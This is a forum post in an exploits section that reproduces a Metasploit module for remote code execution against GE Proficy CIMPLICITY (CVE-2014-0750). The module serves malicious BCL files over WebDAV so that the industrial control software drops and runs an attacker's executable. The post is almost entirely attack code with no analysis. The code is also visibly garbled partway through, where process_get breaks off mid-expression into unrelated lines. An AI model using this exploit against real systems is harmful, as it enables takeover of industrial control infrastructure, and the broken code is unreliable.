Jump to content
sensi

GE Proficy CIMPLICITY gefebt.exe Remote Code Execution

By sensi, in Exploituri

Recommended Posts

sensi Newbie

sensi

Posted
Posted 
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Auxiliary::Report
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize
    super(
      'Name'          => 'GE Proficy CIMPLICITY gefebt.exe Remote Code Execution',
      'Description'   => %q{
        This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the
        CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in
        shared resources. An attacker can abuse this behaviour to execute a malicious BCL and
        drop an arbitrary EXE. The last one can be executed remotely through the WebView server.
        This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded
        CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. When
        the target hasn't the WebClient service enabled, an external SMB service is necessary.
      },
      'Author'      => [
        'amisto0x07', # Vulnerability discovery
        'Z0mb1E', # Vulnerability discovery
        'juan vazquez' # Metasploit module
      ],
      'References'  =>
        [
          [ 'CVE', '2014-0750'],
          [ 'ZDI', '14-015' ],
          [ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01' ]
        ],
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Platform'    => 'win',
      'Targets'     =>
        [
          [ 'GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)', { } ]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => true,
      'DisclosureDate' => 'Jan 23 2014'
    )
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('URIPATH',   [ true, 'The URI to use (do not change)', '/' ]),
        OptPort.new('SRVPORT',     [ true, 'The daemon port to listen on (do not change)', 80 ]),
        OptString.new('UNCPATH',   [ false, 'Override the UNC path to use.' ]),
        OptBool.new('ONLYMAKE',    [ false, 'Just generate the malicious BCL files for using with an external SMB server.', true ]),
        OptString.new('TARGETURI', [true, 'The base path to the CimWeb', '/'])
      ], self.class)
  end

  def on_request_uri(cli, request)
    case request.method
      when 'OPTIONS'
        process_options(cli, request)
      when 'PROPFIND'
        process_propfind(cli, request)
      when 'GET'
        process_get(cli, request)
      else
        vprint_status("#{request.method} => 404 (#{request.uri})")
        resp = create_response(404, "Not Found")
        resp.body = ""
        resp['Content-Type'] = 'text/html'
        cli.send_response(resp)
    end
  end

  def process_get(cli, request)
    if request.uri =~ /# @exe_filename)
    uri << "?"

    # Enough timeout to execute the payload, but don't block the exploit
    # until there is an answer.
    send_request_cgi({'uri' => uri}, 3)
  end

  def primer
    exploit_bcl
    service.stop
  end

  def file_create(fname, data)
    ltype = "exploit.fileformat.#{self.shortname}"
    full_path = store_local(ltype, nil, data, fname)
    print_good("#{fname} stored at #{full_path}")
  end

end

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...